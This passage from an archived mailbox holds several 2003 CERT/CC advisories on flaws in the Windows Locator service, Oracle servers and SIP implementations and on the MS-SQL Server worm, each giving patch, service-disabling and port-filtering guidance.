basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History January 22, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPi8vSmjtSoHZUTs5AQGr2wQAwBNBUDgbiDbXzF3CsqmOgzQUKrgKYWHJ wbeH8Y+6Eiuha2bu/2JDBxYWOPdPUhu11USaa8fwg9k73yjVUCVeT+mRBTjVsw9k 9jwT96JtKj2aNyRT+KR4YAme0JzQCqgJD88B8Z6vCWdsMJXPKg1acjou2qNwbaqz UCRRY26e5dk= =FBp0 -----END PGP SIGNATURE----- From - Thu Jan 23 16:38:24 2003 X-UIDL: 2790 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id h0O0YZX3251549; Thu, 23 Jan 2003 16:34:35 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id h0NLM8806004; Thu, 23 Jan 2003 16:22:08 -0500 Date: Thu, 23 Jan 2003 16:22:08 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-03 Buffer Overflow in Windows Locator Service Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 74 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-03 Buffer Overflow in Windows Locator Service Original issue date: January 23, 2003 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Microsoft Windows NT 4.0 * Microsoft Windows NT 4.0, Terminal Server Edition * Microsoft Windows 2000 * Microsoft Windows XP Overview A buffer overflow vulnerability in the Microsoft Windows Locator service could allow a remote attacker to execute arbitrary code or cause the Windows Locator service to fail. This service is enabled and running by default on Windows 2000 domain controllers and Windows NT 4.0 domain controllers. I. Description A buffer overflow in the Windows Locator service may make it possible for a remote attacker to execute arbitrary code on a vulnerable system by sending an overly large request to the Windows Locator service. Microsoft describes the Windows Locator service as "a name service that maps logical names to network-specific names." From MS03-001: A client that is going to make a Remote Procedure Call (RPC) can call the Locator service to resolve a logical name for a network object to a network-specific name for use in the RPC. For example, if a print server has the logical name "laserprinter", an RPC client could call the Locator service to find out the network-specific name that mapped to "laserprinter". The RPC client uses the network-specific name when it makes the RPC call to the service. Further information about this vulnerability can be found in Microsoft Security Bulletin MS03-001 and in CERT/CC Vulnerability Note VU#610986, which correspond to CVE candidate CAN-2003-0003. II. Impact A remote attacker may be able to execute arbitrary code on a vulnerable system, or cause the Windows Locator service to fail. An attacker who is able to compromise a domain controller might be able to cause the compromised domain controller to trust the attacker's domain. III. Solution Apply a patch Disable vulnerable service Until a patch can be applied, you may wish to disable the Windows Locator service. To determine if the Windows Locator service is running, Microsoft recommends the following: * The status of the "Remote Procedure Call (RPC) Locator" service and how it is started (automatically or manually) can be viewed in the Control Panel. For Windows 2000 and Windows XP, use Control Panel | Administrative Tools | Services, and on Windows NT 4.0, use Control Panel | Services. * It is also possible to determine the status of the Locator service from the command line by entering: net start * A list of services will be displayed. If "Remote Procedure Call (RPC) Locator" appears in the list, then the locator service is running. To disable the Windows Locator service, Microsoft recommends the following: * An administrator can disable the Locator service by setting the RpcLocator service status to "disabled" in the services control panel. * The service can also be stopped via the command line using the sc.exe program, which ships with Windows XP and is included as part of the Windows 2000 Resource Kit. The following command will stop the service: sc stop RpcLocator * To disable the service using the command line tool, use the following: sc config RpcLocator start= disabled Restrict access to NetBIOS You may wish to block access to NetBIOS from outside your network perimeter. This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. As a best practice, the CERT/CC recommends disabling all services that are not explicitly required. Before deciding to disable the Windows Locator service, carefully consider your service requirements. Please also note that Microsoft is actively deploying the patches for this vulnerability via Windows Update. Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. Microsoft Corporation Please see Microsoft Security Bulletin MS03-001. Appendix B. References * Microsoft Security Bulletin MS03-001 - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-001.asp * CERT/CC Vulnerability Note VU#10986 - http://www.kb.cert.org/vuls/id/610986 _________________________________________________________________ This vulnerability was discovered by David Litchfield of Next Generation Security Software Ltd and was first described in MS03-001. _________________________________________________________________ Author: Ian A. Finlay. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2003-03.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History January 23, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPjBbdGjtSoHZUTs5AQHgQAQAs9YLndDSDvjZKBTpDPAFK9FjQzUjlNRR p0xIrC8o3R7u1LG+YnBiisUXdvv9S9nnp5TBPfeYVllDkQMsCkgsWSKNNuRclhNN RtQUlYVpt+AGWB7RCQpn9jENpG7M3dbaFcQVFksYQWNE9OLhU7bGSzHBc3wg++Uv IGfitgzC2MA= =1PxZ -----END PGP SIGNATURE----- From - Sat Jan 25 13:50:41 2003 X-UIDL: 2856 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id h0PLldX3499851; Sat, 25 Jan 2003 13:47:39 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id h0PH3AE28612; Sat, 25 Jan 2003 12:03:10 -0500 Date: Sat, 25 Jan 2003 12:03:10 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-04 MS-SQL Server Worm Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 75 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-04 MS-SQL Server Worm Original release date: January 25, 2003 Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Microsoft SQL Server 2000 Overview The CERT/CC has received reports of self-propagating malicious code that exploits multiple vulnerabilities in the Resolution Service of Microsoft SQL Server 2000. The propagation of this worm has caused varied levels of network degradation across the Internet, in addition to the compromise of vulnerable machines I. Description The worm targeting SQL Server computers is self-propagating malicious code that most likely exploits two vulnerabilities in the Resolution Service of Microsoft SQL Server 2000 vulnerabilities. The vulnerability documented in VU#370308 allows the keep-alive functionality employed by the SQL Server Resolution Service to launch a denial of service against other hosts. Either the vulnerability VU#399260 or VU#484891 allow for the execution of arbitrary code on the SQL Server computer due to a buffer overflow. VU#370308 - http://www.kb.cert.org/vuls/id/370308 VU#399260 - http://www.kb.cert.org/vuls/id/399260 VU#484891 - http://www.kb.cert.org/vuls/id/484891 Reports to the CERT/CC indicate that the high volume of 1434/udp traffic generated between hosts infected with the worm targeting SQL Server computers may itself lead to performance issues (including possible denial-of-service conditions) on networks with infected hosts. Activity of this worm is readily identifiable on a network by the presence of small UDP packets (we have received reports of 376-410 byte packets) from seemingly random IP addresses from across the Internet to port 1434/udp. II. Impact Compromise by the worm indicates that a remote attacker can execute arbitrary code as the local SYSTEM user on the victim system. It may be possible for an attacker to subsequently leverage a local privilege escalation exploit in order to gain Administrator access to the victim system. The high volume of 1434/udp traffic generated between hosts infected with the worm may itself lead to performance issues on networks with both infected and targeted, but non-vulnerable hosts. III. Solution Apply a patch Administrators of all systems running Microsoft SQL Server 2000 are encouraged to review CA-2002-22 and VU#370308 for detailed vendor recommendations regarding installing the patch: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-039.asp CA-2002-22 - http://www.cert.org/advisories/CA-2002-22.html VU#370308 - http://www.kb.cert.org/vuls/id/370308 Ingress/Egress filtering The following steps are only effective in limiting the damage that can be done by systems already infected with the worm. They provide no protection whatsoever against the initial infection of systems. As a result, these steps are only recommended in addition to the preventative steps outlined above, not in lieu thereof. Ingress filtering manages the flow of traffic as it enters a network under your administrative control. Servers are typically the only machines that need to accept inbound traffic from the public Internet. In the network usage policy of many sites, external hosts are only permitted to initiate inbound traffic to machines that provide public services on specific ports. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound traffic to non-authorized services. Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound connections to the Internet. In the case of this worm, employing ingress and egress filtering can help prevent compromised systems on your network from attacking systems elsewhere. Blocking UDP datagrams with both source and destination ports 1434 from entering or leaving your network reduces the risk of external infected systems communicating with infected hosts inside your network. Recovering from a system compromise If you believe a system under your administrative control has been compromised, please follow the steps outlined in: Steps for Recovering from a UNIX or NT System Compromise http://www.cert.org/tech_tips/win-UNIX-system_compromise.html Reporting The CERT/CC is interested in receiving reports of this activity. If machines under your administrative control are compromised, please send mail to cert@cert.org with the following text included in the subject line: "[CERT#35663]". _________________________________________________________________ Feedback can be directed to the author: Roman Danyliw ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2003-04.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History January 25, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPjKkJmjtSoHZUTs5AQG4KgP+MGcnpMxQrAVMBu+jhPhIobYp2eaPRSfx Nj5TQs9A3749p11Of1h5KxyqrjBhL/Ff8jyac4Vj0XWa4KtYeiPbC0feN49LKEnn 6JLf24Pyov3wEPn9tcBJ511lAhD506sUVsTTrexrFUgaSCFnG4nucP1wC93JUbdx QxMA0Aixt1U= =VhD+ -----END PGP SIGNATURE----- From - Wed Feb 19 15:02:18 2003 X-UIDL: 3324 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id h1JMx8Yt147771; Wed, 19 Feb 2003 14:59:08 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id h1JKEZd20174; Wed, 19 Feb 2003 15:14:35 -0500 Date: Wed, 19 Feb 2003 15:14:35 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-05 Multiple Vulnerabilities in Oracle Servers Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 76 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-05 Multiple Vulnerabilities in Oracle Servers Original release date: February 19, 2003 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Systems running Oracle9i Database (Release 1 and 2) * Systems running Oracle8i Database v 8.1.7 * Systems running Oracle8 Database v 8.0.6 * Systems running Oracle9i Application Server (Release 9.0.2 and 9.0.3) Overview Multiple vulnerabilities exist in Oracle software that may lead to execution of arbitrary code; the ability to read, modify, or delete information stored in underlying Oracle databases; or denial of service. All of these vulnerabilites were discovered by Next Generation Security Software Ltd. I. Description Multiple vulnerabilities exist in Oracle9i Application Server, Oracle9i Database, and Oracle8i Database. The majority of these vulnerabilities are buffer overflows. Oracle has published Security Alerts describing these vulnerabilities. If you use Oracle products listed in the "Systems Affected" section of this document, we strongly encourage you to review the following Oracle Security Alerts and apply patches as appropriate: * Buffer Overflow in DIRECTORY parameter of Oracle9i Database Server http://otn.oracle.com/deploy/security/pdf/2003alert48.pdf * Buffer Overflow in TZ_OFFSET function of Oracle9i Database Server http://otn.oracle.com/deploy/security/pdf/2003alert49.pdf * Buffer Overflow in TO_TIMESTAMP_TZ function of Oracle9i Database Server http://otn.oracle.com/deploy/security/pdf/2003alert50.pdf * Buffer Overflow in ORACLE.EXE binary of Oracle9i Database Server http://otn.oracle.com/deploy/security/pdf/2003alert51.pdf * Two Vulnerabilities in Oracle9i Application Server http://otn.oracle.com/deploy/security/pdf/2003alert52.pdf NGSSoftware Insight Security Research Advisories describing these issues are listed below: * Oracle9i Application Server Format String Vulnerability http://www.nextgenss.com/advisories/ora-appservfmtst.txt * Oracle TO_TIMESTAMP_TZ Remote System Buffer Overrun http://www.nextgenss.com/advisories/ora-tmstmpbo.txt * ORACLE bfilename function buffer overflow vulnerability http://www.nextgenss.com/advisories/ora-bfilebo.txt * Oracle TZ_OFFSET Remote System Buffer Overrun http://www.nextgenss.com/advisories/ora-tzofstbo.txt * Oracle unauthenticated remote system compromise http://www.nextgenss.com/advisories/ora-unauthrm.txt The CERT/CC has published vulnerability notes for each of these issues as well. The vulnerability in Oracle's mod_dav module (VU#849993) has been as assigned CVE ID CAN-2002-0842. II. Impact Depending on the vulnerability being exploited, an attacker may be able to execute arbitrary code; read, modify, or delete information stored in underlying Oracle databases; or cause a denial of service. The vulnerabilities in "ORACLE.EXE" (VU#953746) and the WebDAV modules (VU#849993, VU#511194) may be exploited prior to authentication. III. Solution Apply a patch Solutions for specific vulnerabilities can be found in the above referenced Oracle Security Alerts, NGSSoftware Insight Security Research Advisories, and individual CERT/CC Vulnerability Notes. Mitigation Strategies Until a patch can be applied, the CERT/CC recommends that vulnerable sites * disable unnecessary Oracle services * run Oracle services with the least privilege * restrict network access to Oracle services Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. Oracle Corporation Please see the following Oracle Security Alerts: * http://otn.oracle.com/deploy/security/pdf/2003alert48.pdf * http://otn.oracle.com/deploy/security/pdf/2003alert49.pdf * http://otn.oracle.com/deploy/security/pdf/2003alert50.pdf * http://otn.oracle.com/deploy/security/pdf/2003alert51.pdf * http://otn.oracle.com/deploy/security/pdf/2003alert52.pdf Appendix B. References * http://otn.oracle.com/deploy/security/pdf/2003alert48.pdf * http://otn.oracle.com/deploy/security/pdf/2003alert49.pdf * http://otn.oracle.com/deploy/security/pdf/2003alert50.pdf * http://otn.oracle.com/deploy/security/pdf/2003alert51.pdf * http://otn.oracle.com/deploy/security/pdf/2003alert52.pdf * http://www.nextgenss.com/advisories/ora-appservfmtst.txt * http://www.nextgenss.com/advisories/ora-tmstmpbo.txt * http://www.nextgenss.com/advisories/ora-bfilebo.txt * http://www.nextgenss.com/advisories/ora-tzofstbo.txt * http://www.nextgenss.com/advisories/ora-unauthrm.txt * http://www.kb.cert.org/vuls/id/743954 * http://www.kb.cert.org/vuls/id/953746 * http://www.kb.cert.org/vuls/id/663786 * http://www.kb.cert.org/vuls/id/840666 * http://www.kb.cert.org/vuls/id/511194 * http://www.kb.cert.org/vuls/id/849993 * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0842 _________________________________________________________________ The CERT/CC acknowledges both Next Generation Security Software Ltd. and Oracle for providing information upon which this document is based. _________________________________________________________________ Feedback can be directed to the author: Ian A. Finlay. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2003-04.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History February 19, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPlPkcmjtSoHZUTs5AQGFkAQAmTTDL3Tyn818VW59c0Ec5Tt+N78TKs8y h6Mnp4gkZuFLaPXju8zw1oNat4HoR7JWefBo7Lj6QFMf9HANlg7NexYmmQZSupL/ TZrFF6Nisfg/jQ7H6hPH/kajm/siJO6BuPgQIyEWtHkrJ6ce4jgcPGmuJsLzuUW3 N4QKY3gFD2A= =nkbt -----END PGP SIGNATURE----- From - Fri Feb 21 11:39:40 2003 X-UIDL: 3346 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.7/8.12.3) with ESMTP id h1LIvXAX347518; Fri, 21 Feb 2003 10:57:33 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id h1LFPcR05853; Fri, 21 Feb 2003 10:25:38 -0500 Date: Fri, 21 Feb 2003 10:25:38 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-06 Multiple vulnerabilities in implementations of the Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 77 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-06 Multiple vulnerabilities in implementations of the Session Initiation Protocol (SIP) Original release date: February 21, 2003 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected SIP-enabled products from a wide variety of vendors are affected. Other systems making use of SIP may also be vulnerable but were not specifically tested. Not all SIP implementations are affected. See Vendor Information for details from vendors who have provided feedback for this advisory. In addition to the vendors who provided feedback for this advisory, a list of vendors whom CERT/CC contacted regarding these problems is available from VU#528719. Overview Numerous vulnerabilities have been reported in multiple vendors' implementations of the Session Initiation Protocol. These vulnerabilities may allow an attacker to gain unauthorized privileged access, cause denial-of-service attacks, or cause unstable system behavior. If your site uses SIP-enabled products in any capacity, the CERT/CC encourages you to read this advisory and follow the advice provided in the Solution section below. I. Description The Session Initiation Protocol (SIP) is a developing and newly deployed protocol that is commonly used in Voice over IP (VoIP), Internet telephony, instant messaging, and various other applications. SIP is a text-based protocol for initiating communication and data sessions between users. The Oulu University Secure Programming Group (OUSPG) previously conducted research into vulnerabilities in LDAP, culminating in CERT Advisory CA-2001-18, and SNMP, resulting in CERT Advisory CA-2002-03. OUSPG's most recent research focused on a subset of SIP related to the INVITE message, which SIP agents and proxies are required to accept in order to set up sessions. By applying the PROTOS c07-sip test suite to a variety of popular SIP-enabled products, the OUSPG discovered impacts ranging from unexpected system behavior and denial of services to remote code execution. Note that "throttling" is an expected behavior. Specifications for the Session Initiation Protocol are available in RFC3261: http://www.ietf.org/rfc/rfc3261.txt OUSPG has established the following site with detailed documentation regarding SIP and the implementation test results from the test suite: http://www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/ The IETF Charter page for SIP is available at http://www.ietf.org/html.charters/sip-charter.html II. Impact Exploitation of these vulnerabilities may result in denial-of-service conditions, service interruptions, and in some cases may allow an attacker to gain unauthorized access to the affected device. Specific impacts will vary from product to product. III. Solution Many of the mitigation steps recommended below may have significant impact on your everyday network operations and/or network architecture. Ensure that any changes made based on the following recommendations will not unacceptably affect your ongoing network operations capability. Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. Please consult this appendix and VU#528719 to determine if your product is vulnerable. If a statement is unavailable, you may need to contact your vendor directly. Disable the SIP-enabled devices and services As a general rule, the CERT/CC recommends disabling any service or capability that is not explicitly required. Some of the affected products may rely on SIP to be functional. You should carefully consider the impact of blocking services that you may be using. Ingress filtering As a temporary measure, it may be possible to limit the scope of these vulnerabilities by blocking access to SIP devices and services at the network perimeter. Ingress filtering manages the flow of traffic as it enters a network under your administrative control. Servers are typically the only machines that need to accept inbound traffic from the public Internet. Note that most SIP User Agents (including IP phones or "clien"t software) consist of a User Agent Client and a User Agent Server. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound traffic to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound traffic to non-authorized services. For SIP, ingress filtering of the following ports can prevent attackers outside of your network from accessing vulnerable devices in the local network that are not explicitly authorized to provide public SIP services: sip 5060/udp # Session Initiation Protocol (SIP) sip 5060/tcp # Session Initiation Protocol (SIP) sip 5061/tcp # Session Initiation Protocol (SIP) over TLS Careful consideration should be given to addresses of the types mentioned above by sites planning for packet filtering as part of their mitigation strategy for these vulnerabilities. Please note that this workaround may not protect vulnerable devices from internal attacks. Egress filtering Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound traffic to the Internet. In the case of the SIP vulnerabilities, employing egress filtering on the ports listed above at your network border may prevent your network from being used as a source for attacks on other sites. Block SIP requests directed to broadcast addresses at your router. Since SIP requests can be transmitted via UDP, broadcast attacks are possible. One solution to prevent your site from being used as an intermediary in an attack is to block SIP requests directed to broadcast addresses at your router. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. America Online Inc Not vulnerable. Apple Computer Inc. There are currently no applications shipped by Apple with Mac OS X or Mac OS X Server which make use of the Session Initiation Protocol. Borderware No BorderWare products make use of SIP and thus no BorderWare products are affected by this vulnerability. Clavister No Clavister products currently incorporate support for the SIP protocol suite, and as such, are not vulnerable. We would however like to extend our thanks to the OUSPG for their work as well as for the responsible manner in which they handle their discoveries. Their detailed reports and test suites are certainly well-received. We would also like to reiterate the fact that SIP has yet to mature, protocol-wise as well as implementation-wise. We do not recommend that our customers set up SIP relays in parallel to our firewall products to pass SIP-based applications in or out of networks where security is a concern of note. F5 Networks F5 Networks does not have a SIP server product, and is therefore not affected by this vulnerability. Fujitsu With regards to VU#528719, Fujitsu's UXP/V o.s. is not vulnerable because the relevant function is not supported under UXP/V. IBM SIP is not implemented as part of the AIX operating system. IP Filter IPFilter does not do any SIP specific protocol handling and is therefore not affected by the issues mentioned in the paper cited. IPTel All versions of SIP Express Router up to 0.8.9 are sadly vulnerable to the OUSPG test suite. We strongly advice to upgrade to version 0.8.10. Please also apply the patch to version 0.8.10 from http://www.iptel.org/ser/security/ before installation and keep on watching this site in the future. We apologize to our users for the trouble. Hewlett-Packard Company Source: Hewlett-Packard Company Software Security Response Team cross reference id: SSRT2402 HP-UX - not vulnerable HP-MPE/ix - not vulnerable HP Tru64 UNIX - not vulnerable HP OpenVMS - not vulnerable HP NonStop Servers - not vulnerable To report potential security vulnerabilities in HP software, send an E-mail message to: mailto:security-alert@hp.com Lucent No Lucent products are known to be affected by this vulnerability, however we are still researching the issue and will update this statement as needed. Microsoft Corporation Microsoft has investigated these issues. The Microsoft SIP client implementation is not affected. NEC Corporation =================================================================== NEC vendor statement for VU#528719 =================================================================== sent on February 13, 2002 Server Products * EWS/UP 48 Series operating system * - is NOT vulnerable, because it does not support SIP. Router Products * IX 1000 / 2000 / 5000 Series * - is NOT vulnerable, because it does not support SIP. Other Network products * We continue to check our products which support SIP protocol. =================================================================== NETBSD NetBSD does not ship any implementation of SIP. NETfilter.org As the linux 2.4/2.5 netfilter implementation currently doesn't support connection tracking or NAT for the SIP protocol suite, we are not vulnerable to this bug. NetScreen NetScreen is not vulnerable to this issue. Network Appliance NetApp products are not affected by this vulnerability. Nokia Nokia IP Security Platforms based on IPSO, Nokis Small Office Solution platforms, Nokia VPN products and Nokia Message Protector platform do not initiate or terminate SIP based sessions. The mentioned Nokia products are not susceptible to this vulnerability Nortel Networks Nortel Networks is cooperating to the fullest extent with the CERT Coordination Center. All Nortel Networks products that use Session Initiation Protocol SIP) have been tested and all generally available products, with the following exceptions, have passed the test suite: Succession Communication Server 2000 and Succession Communication Server 2000 - Compact are impacted by the test suite only in configurations where SIP-T has been provisioned within the Communication Server; a software patch is expected to be available by the end of February. For further information about Nortel Networks products please contact Nortel Networks Global Network Support. North America: 1-800-4-NORTEL, or (1-800-466-7835) Europe, Middle East & Africa: 00800 8008 9009, or +44 (0) 870 907 9009 Contacts for other regions available at the Global Contact web page. Novell Novell has no products implementing SIP. Secure Computing Corporation Neither Sidewinder nor Gauntlet implements SIP, so we do not need to be on the vendor list for this vulnerability. SecureWorx We hereby attest that SecureWorx Basilisk Gateway Security product suite (Firmware version 3.4.2 or later) is NOT VULNERABLE to the Session Initiation Protocol (SIP) Vulnerability VU#528719 as described in the OUSPG announcement (OUSPG#0106) received on Fri, 8 Nov 2002 10:17:11 -0500. Stonesoft Stonesoft's StoneGate high availability firewall and VPN product does not contain any code that handles SIP protocol. No versions of StoneGate are vulnerable. Symantec Symantec Corporation products are not vulnerable to this issue. Symantec does not implement the Session Initiation Protocol (SIP) in any of our products. Xerox Xerox is aware of this vulnerability and is currently assessing all products. This statement will be updated as new information becomes available. Appendix B. - References 1. http://www.ee.oulu.fi/research/ouspg/protos/ 2. http://www.kb.cert.org/vuls/id/528719 3. http://www.cert.org/tech_tips/denial_of_service.html 4. http://www.ietf.org/html.charters/sip-charter.html 5. RFC3261 - SIP: Session Initiation Protocol 6. RFC2327 - SDP: Session Description Protocol 7. RFC2279 - UTF-8, a transformation format of ISO 10646 8. Session Initiation Protocol Basic Call Flow Examples 9. Session Initiation Protocol Torture Test Messages, Draft _________________________________________________________________ The CERT Coordination Center thanks the Oulu University Secure Programming Group for reporting these vulnerabilities to us, for providing detailed technical analysis, and for assisting us in preparing this advisory. We would also like to acknowledge the "RedSkins" project of "MediaTeam Oulu" for their support of this research. _________________________________________________________________ Feedback on this document can be directed to the authors, Jason A. Rafail and Ian A. Finlay. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2003-06.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on 